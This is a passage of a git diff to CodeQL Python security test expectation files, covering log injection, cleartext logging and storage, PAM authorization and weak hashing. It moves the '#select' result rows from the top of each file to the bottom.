| LogInjectionBad.py:7:19:7:25 | ControlFlowNode for request | provenance | | | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for request | LogInjectionBad.py:17:12:17:18 | ControlFlowNode for request | provenance | | @@ -49,3 +44,8 @@ nodes | LogInjectionBad.py:35:12:35:35 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | subpaths +#select +| LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected index 99114d85cfbd..8031d3070c94 100644 --- a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected +++ b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected @@ -1,5 +1,3 @@ -#select -| pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | This PAM authentication depends on a $@, and 'pam_acct_mgmt' is not called afterwards. | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | user-provided value | edges | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:4:26:4:32 | ControlFlowNode for request | provenance | | | pam_test.py:4:26:4:32 | ControlFlowNode for request | pam_test.py:71:16:71:22 | ControlFlowNode for request | provenance | | @@ -22,3 +20,5 @@ nodes | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | semmle.label | ControlFlowNode for pam_authenticate() | | pam_test.py:76:31:76:36 | ControlFlowNode for handle | semmle.label | ControlFlowNode for handle | subpaths +#select +| pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | This PAM authentication depends on a $@, and 'pam_acct_mgmt' is not called afterwards. | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected index 47f27dbc5f27..5da1b60eee12 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected @@ -1,28 +1,3 @@ -#select -| test.py:20:48:20:55 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:20:48:20:55 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:22:58:22:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:22:58:22:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:23:58:23:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:23:58:23:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:27:40:27:47 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:27:40:27:47 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:30:58:30:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:30:58:30:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:37:11:37:24 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:39:22:39:35 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:40:22:40:35 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:45:11:45:11 | ControlFlowNode for x | test.py:44:9:44:25 | ControlFlowNode for Attribute() | test.py:45:11:45:11 | ControlFlowNode for x | This expression logs $@ as clear text. | test.py:44:9:44:25 | ControlFlowNode for Attribute() | sensitive data (password) | -| test.py:49:15:49:36 | ControlFlowNode for social_security_number | test.py:48:14:48:35 | ControlFlowNode for social_security_number | test.py:49:15:49:36 | ControlFlowNode for social_security_number | This expression logs $@ as clear text. | test.py:48:14:48:35 | ControlFlowNode for social_security_number | sensitive data (private) | -| test.py:50:15:50:17 | ControlFlowNode for ssn | test.py:48:38:48:40 | ControlFlowNode for ssn | test.py:50:15:50:17 | ControlFlowNode for ssn | This expression logs $@ as clear text. | test.py:48:38:48:40 | ControlFlowNode for ssn | sensitive data (private) | -| test.py:52:15:52:24 | ControlFlowNode for passportNo | test.py:48:54:48:63 | ControlFlowNode for passportNo | test.py:52:15:52:24 | ControlFlowNode for passportNo | This expression logs $@ as clear text. | test.py:48:54:48:63 | ControlFlowNode for passportNo | sensitive data (private) | -| test.py:55:15:55:23 | ControlFlowNode for post_code | test.py:54:14:54:22 | ControlFlowNode for post_code | test.py:55:15:55:23 | ControlFlowNode for post_code | This expression logs $@ as clear text. | test.py:54:14:54:22 | ControlFlowNode for post_code | sensitive data (private) | -| test.py:56:15:56:21 | ControlFlowNode for zipCode | test.py:54:25:54:31 | ControlFlowNode for zipCode | test.py:56:15:56:21 | ControlFlowNode for zipCode | This expression logs $@ as clear text. | test.py:54:25:54:31 | ControlFlowNode for zipCode | sensitive data (private) | -| test.py:57:15:57:26 | ControlFlowNode for home_address | test.py:54:34:54:45 | ControlFlowNode for home_address | test.py:57:15:57:26 | ControlFlowNode for home_address | This expression logs $@ as clear text. | test.py:54:34:54:45 | ControlFlowNode for home_address | sensitive data (private) | -| test.py:60:15:60:27 | ControlFlowNode for user_latitude | test.py:59:14:59:26 | ControlFlowNode for user_latitude | test.py:60:15:60:27 | ControlFlowNode for user_latitude | This expression logs $@ as clear text. | test.py:59:14:59:26 | ControlFlowNode for user_latitude | sensitive data (private) | -| test.py:61:15:61:28 | ControlFlowNode for user_longitude | test.py:59:29:59:42 | ControlFlowNode for user_longitude | test.py:61:15:61:28 | ControlFlowNode for user_longitude | This expression logs $@ as clear text. | test.py:59:29:59:42 | ControlFlowNode for user_longitude | sensitive data (private) | -| test.py:64:15:64:27 | ControlFlowNode for mobile_number | test.py:63:14:63:26 | ControlFlowNode for mobile_number | test.py:64:15:64:27 | ControlFlowNode for mobile_number | This expression logs $@ as clear text. | test.py:63:14:63:26 | ControlFlowNode for mobile_number | sensitive data (private) | -| test.py:65:15:65:21 | ControlFlowNode for phoneNo | test.py:63:29:63:35 | ControlFlowNode for phoneNo | test.py:65:15:65:21 | ControlFlowNode for phoneNo | This expression logs $@ as clear text. | test.py:63:29:63:35 | ControlFlowNode for phoneNo | sensitive data (private) | -| test.py:68:15:68:24 | ControlFlowNode for creditcard | test.py:67:14:67:23 | ControlFlowNode for creditcard | test.py:68:15:68:24 | ControlFlowNode for creditcard | This expression logs $@ as clear text. | test.py:67:14:67:23 | ControlFlowNode for creditcard | sensitive data (private) | -| test.py:69:15:69:24 | ControlFlowNode for debit_card | test.py:67:26:67:35 | ControlFlowNode for debit_card | test.py:69:15:69:24 | ControlFlowNode for debit_card | This expression logs $@ as clear text. | test.py:67:26:67:35 | ControlFlowNode for debit_card | sensitive data (private) | -| test.py:70:15:70:25 | ControlFlowNode for bank_number | test.py:67:38:67:48 | ControlFlowNode for bank_number | test.py:70:15:70:25 | ControlFlowNode for bank_number | This expression logs $@ as clear text. | test.py:67:38:67:48 | ControlFlowNode for bank_number | sensitive data (private) | -| test.py:73:15:73:17 | ControlFlowNode for ccn | test.py:67:76:67:78 | ControlFlowNode for ccn | test.py:73:15:73:17 | ControlFlowNode for ccn | This expression logs $@ as clear text. | test.py:67:76:67:78 | ControlFlowNode for ccn | sensitive data (private) | -| test.py:74:15:74:22 | ControlFlowNode for user_ccn | test.py:67:81:67:88 | ControlFlowNode for user_ccn | test.py:74:15:74:22 | ControlFlowNode for user_ccn | This expression logs $@ as clear text. | test.py:67:81:67:88 | ControlFlowNode for user_ccn | sensitive data (private) | edges | test.py:19:5:19:12 | ControlFlowNode for password | test.py:20:48:20:55 | ControlFlowNode for password | provenance | | | test.py:19:5:19:12 | ControlFlowNode for password | test.py:22:58:22:65 | ControlFlowNode for password | provenance | | @@ -92,3 +67,28 @@ nodes | test.py:73:15:73:17 | ControlFlowNode for ccn | semmle.label | ControlFlowNode for ccn | | test.py:74:15:74:22 | ControlFlowNode for user_ccn | semmle.label | ControlFlowNode for user_ccn | subpaths +#select +| test.py:20:48:20:55 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:20:48:20:55 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:22:58:22:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:22:58:22:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:23:58:23:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:23:58:23:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:27:40:27:47 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:27:40:27:47 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:30:58:30:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:30:58:30:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:37:11:37:24 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:39:22:39:35 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:40:22:40:35 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:45:11:45:11 | ControlFlowNode for x | test.py:44:9:44:25 | ControlFlowNode for Attribute() | test.py:45:11:45:11 | ControlFlowNode for x | This expression logs $@ as clear text. | test.py:44:9:44:25 | ControlFlowNode for Attribute() | sensitive data (password) | +| test.py:49:15:49:36 | ControlFlowNode for social_security_number | test.py:48:14:48:35 | ControlFlowNode for social_security_number | test.py:49:15:49:36 | ControlFlowNode for social_security_number | This expression logs $@ as clear text. | test.py:48:14:48:35 | ControlFlowNode for social_security_number | sensitive data (private) | +| test.py:50:15:50:17 | ControlFlowNode for ssn | test.py:48:38:48:40 | ControlFlowNode for ssn | test.py:50:15:50:17 | ControlFlowNode for ssn | This expression logs $@ as clear text. | test.py:48:38:48:40 | ControlFlowNode for ssn | sensitive data (private) | +| test.py:52:15:52:24 | ControlFlowNode for passportNo | test.py:48:54:48:63 | ControlFlowNode for passportNo | test.py:52:15:52:24 | ControlFlowNode for passportNo | This expression logs $@ as clear text. | test.py:48:54:48:63 | ControlFlowNode for passportNo | sensitive data (private) | +| test.py:55:15:55:23 | ControlFlowNode for post_code | test.py:54:14:54:22 | ControlFlowNode for post_code | test.py:55:15:55:23 | ControlFlowNode for post_code | This expression logs $@ as clear text. | test.py:54:14:54:22 | ControlFlowNode for post_code | sensitive data (private) | +| test.py:56:15:56:21 | ControlFlowNode for zipCode | test.py:54:25:54:31 | ControlFlowNode for zipCode | test.py:56:15:56:21 | ControlFlowNode for zipCode | This expression logs $@ as clear text. | test.py:54:25:54:31 | ControlFlowNode for zipCode | sensitive data (private) | +| test.py:57:15:57:26 | ControlFlowNode for home_address | test.py:54:34:54:45 | ControlFlowNode for home_address | test.py:57:15:57:26 | ControlFlowNode for home_address | This expression logs $@ as clear text. | test.py:54:34:54:45 | ControlFlowNode for home_address | sensitive data (private) | +| test.py:60:15:60:27 | ControlFlowNode for user_latitude | test.py:59:14:59:26 | ControlFlowNode for user_latitude | test.py:60:15:60:27 | ControlFlowNode for user_latitude | This expression logs $@ as clear text. | test.py:59:14:59:26 | ControlFlowNode for user_latitude | sensitive data (private) | +| test.py:61:15:61:28 | ControlFlowNode for user_longitude | test.py:59:29:59:42 | ControlFlowNode for user_longitude | test.py:61:15:61:28 | ControlFlowNode for user_longitude | This expression logs $@ as clear text. | test.py:59:29:59:42 | ControlFlowNode for user_longitude | sensitive data (private) | +| test.py:64:15:64:27 | ControlFlowNode for mobile_number | test.py:63:14:63:26 | ControlFlowNode for mobile_number | test.py:64:15:64:27 | ControlFlowNode for mobile_number | This expression logs $@ as clear text. | test.py:63:14:63:26 | ControlFlowNode for mobile_number | sensitive data (private) | +| test.py:65:15:65:21 | ControlFlowNode for phoneNo | test.py:63:29:63:35 | ControlFlowNode for phoneNo | test.py:65:15:65:21 | ControlFlowNode for phoneNo | This expression logs $@ as clear text. | test.py:63:29:63:35 | ControlFlowNode for phoneNo | sensitive data (private) | +| test.py:68:15:68:24 | ControlFlowNode for creditcard | test.py:67:14:67:23 | ControlFlowNode for creditcard | test.py:68:15:68:24 | ControlFlowNode for creditcard | This expression logs $@ as clear text. | test.py:67:14:67:23 | ControlFlowNode for creditcard | sensitive data (private) | +| test.py:69:15:69:24 | ControlFlowNode for debit_card | test.py:67:26:67:35 | ControlFlowNode for debit_card | test.py:69:15:69:24 | ControlFlowNode for debit_card | This expression logs $@ as clear text. | test.py:67:26:67:35 | ControlFlowNode for debit_card | sensitive data (private) | +| test.py:70:15:70:25 | ControlFlowNode for bank_number | test.py:67:38:67:48 | ControlFlowNode for bank_number | test.py:70:15:70:25 | ControlFlowNode for bank_number | This expression logs $@ as clear text. | test.py:67:38:67:48 | ControlFlowNode for bank_number | sensitive data (private) | +| test.py:73:15:73:17 | ControlFlowNode for ccn | test.py:67:76:67:78 | ControlFlowNode for ccn | test.py:73:15:73:17 | ControlFlowNode for ccn | This expression logs $@ as clear text. | test.py:67:76:67:78 | ControlFlowNode for ccn | sensitive data (private) | +| test.py:74:15:74:22 | ControlFlowNode for user_ccn | test.py:67:81:67:88 | ControlFlowNode for user_ccn | test.py:74:15:74:22 | ControlFlowNode for user_ccn | This expression logs $@ as clear text. | test.py:67:81:67:88 | ControlFlowNode for user_ccn | sensitive data (private) | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected index 66c192b89e03..588cfae32ef5 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected @@ -1,7 +1,3 @@ -#select -| test.py:12:21:12:28 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:12:21:12:28 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:13:22:13:45 | ControlFlowNode for Attribute() | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:13:22:13:45 | ControlFlowNode for Attribute() | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:15:26:15:33 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:15:26:15:33 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | edges | test.py:9:5:9:12 | ControlFlowNode for password | test.py:12:21:12:28 | ControlFlowNode for password | provenance | | | test.py:9:5:9:12 | ControlFlowNode for password | test.py:13:22:13:45 | ControlFlowNode for Attribute() | provenance | | @@ -14,3 +10,7 @@ nodes | test.py:13:22:13:45 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:15:26:15:33 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | subpaths +#select +| test.py:12:21:12:28 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:12:21:12:28 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:13:22:13:45 | ControlFlowNode for Attribute() | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:13:22:13:45 | ControlFlowNode for Attribute() | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:15:26:15:33 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:15:26:15:33 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected index ed748c70df3e..ea41c1ba6516 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected @@ -1,8 +1,3 @@ -#select -| password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | sensitive data (password) | -| password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | sensitive data (password) | -| test.py:17:20:17:27 | ControlFlowNode for password | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:17:20:17:27 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:19:25:19:29 | ControlFlowNode for lines | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:19:25:19:29 | ControlFlowNode for lines | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | edges | password_in_cookie.py:7:5:7:12 | ControlFlowNode for password | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | provenance | | | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:7:5:7:12 | ControlFlowNode for password | provenance | | @@ -29,3 +24,8 @@ nodes | test.py:18:18:18:32 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | | test.py:19:25:19:29 | ControlFlowNode for lines | semmle.label | ControlFlowNode for lines | subpaths +#select +| password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | sensitive data (password) | +| password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | sensitive data (password) | +| test.py:17:20:17:27 | ControlFlowNode for password | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:17:20:17:27 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:19:25:19:29 | ControlFlowNode for lines | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:19:25:19:29 | ControlFlowNode for lines | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected index ae081dd1aa05..1027fbf4963c 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected @@ -1,16 +1,3 @@ -#select -| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | -| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | -| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | -| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | -| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | Sensitive data (password) | edges | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:2:23:2:34 | ControlFlowNode for get_password | provenance | | | test_cryptodome.py:2:23:2:34 | ControlFlowNode for get_password | test_cryptodome.py:13:17:13:28 | ControlFlowNode for get_password | provenance | | @@ -74,3 +61,16 @@ nodes | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | semmle.label | ControlFlowNode for get_password() | | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | semmle.label | ControlFlowNode for dangerous | subpaths +#select +| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | +| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | +| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode 